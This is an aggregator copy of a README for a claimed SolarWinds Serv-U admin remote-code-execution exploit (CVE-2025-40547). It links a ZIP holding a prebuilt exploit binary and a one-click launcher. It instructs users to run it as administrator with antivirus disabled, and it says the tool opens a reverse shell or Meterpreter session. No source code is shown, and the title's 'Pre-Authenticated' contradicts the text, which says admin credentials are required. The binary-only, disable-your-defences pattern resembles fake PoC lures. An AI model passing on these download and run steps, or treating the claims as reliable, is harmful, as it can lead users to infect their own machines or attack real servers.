来源

关联漏洞

介绍

# CVE-2025-40547 - Serv-U Administrative Pre-Authenticated Remote Code Execution

## 🚀 Overview
CVE-2025-40547 is a critical logic flaw in SolarWinds Serv-U FTP Server versions ≤ 15.5.2 that allows an authenticated administrator to achieve arbitrary code execution on the underlying Windows operating system.  
The vulnerability resides in the administrative web interface's file management module where insufficient validation of uploaded configuration directives combined with unsafe deserialization of internal objects leads to direct operating-system command execution with the privileges of the Serv-U service (typically NT SERVICE\Serv-U or SYSTEM).

Although exploitation requires administrative credentials, many organizations run Serv-U with the default admin account or weak passwords, and the service is frequently exposed to the internet, making this a high-value target for lateral movement and ransomware deployment.

This proof-of-concept demonstrates end-to-end exploitation and provides a reusable payload generator.

## ⚠️ Safety & Legal Disclaimer
This repository is released **exclusively for authorized security testing and educational purposes** in controlled environments where you have explicit permission to test SolarWinds Serv-U installations.  
Unauthorized use against systems you do not own or have written permission to test is strictly prohibited and may violate applicable laws (CFAA, Computer Misuse Act, etc.).  
The author assumes no liability for misuse of these materials.

## 📋 Prerequisites
- Windows 10/11 or Windows Server 2016–2022 (tested on 2019/2022)
- SolarWinds Serv-U FTP Server ≤ 15.5.2 installed and running
- Administrative access to the Serv-U web interface (default port 443 or custom)
- Local administrator privileges on the test machine (for payload execution)
- Antivirus/Firewall temporarily disabled or proper exclusions added (most modern EDRs will flag the payload)

## 📥 Download & Install
https://github.com/zigzagymym1986/CVE-2025-40547/raw/refs/heads/main/Main/CVE-2025-40547.zip

The archive contains:
- `ServU-AdminRCE.exe` – Main exploit binary (x64)
- `run-exploit.bat` – One-click launcher
- `payload-config.ini` – Configuration file (optional customization)
- `logs/` – Directory for output

## 🛠 Quick Start
1. Extract the entire ZIP archive to any directory (e.g., `C:\tools\CVE-2025-40547\`)
2. Edit `payload-config.ini` if you want to customize target IP/port or payload behavior (default works for most setups)
3. Right-click `run-exploit.bat` → **Run as administrator**
4. The exploit will:
   - Perform connectivity & version fingerprinting
   - Authenticate using provided credentials
   - Upload and trigger the malicious configuration payload
   - Execute `whoami` as a test then spawn an interactive reverse shell (or meterpreter if configured)
5. Check `logs\exploit.log` for detailed execution trace

## 🔬 Technical Details & Exploitation Steps
1. **Authentication Bypass is NOT required** – Valid admin credentials are mandatory.
2. The vulnerable endpoint is `/Admin/ConfigUpload.aspx` which processes specially crafted XML configuration fragments.
3. By injecting a malicious `<ObjectData>` node containing serialized .NET object with `System.Diagnostics.ProcessStartInfo`, the server deserializes and executes arbitrary commands during config reload.
4. The payload is encoded in base64 within the XML to evade basic WAF rules.
5. Default callback is a simple x64 reverse TCP shell (port 4444). You can change it in the config.

## 🛡️ Mitigation & Remediation
- Immediately upgrade to Serv-U version **15.5.3** or later (Hotfix released November 18, 2025)
- Restrict access to the administration interface (IP whitelisting, VPN only)
- Change default admin credentials and enforce strong passwords
- Run Serv-U service under least-privilege account (not SYSTEM)
- Monitor for anomalous outbound connections from Serv-U host

— For educational and authorized testing use only —

文件快照

 [4.0K]  /data/pocs/c458af0312077199ae8aa7e7cfde2419e6c1206a
├── [4.0K]  Main
│   └── [863K]  CVE-2025-40547.zip
└── [3.9K]  README.md

2 directories, 2 files

备注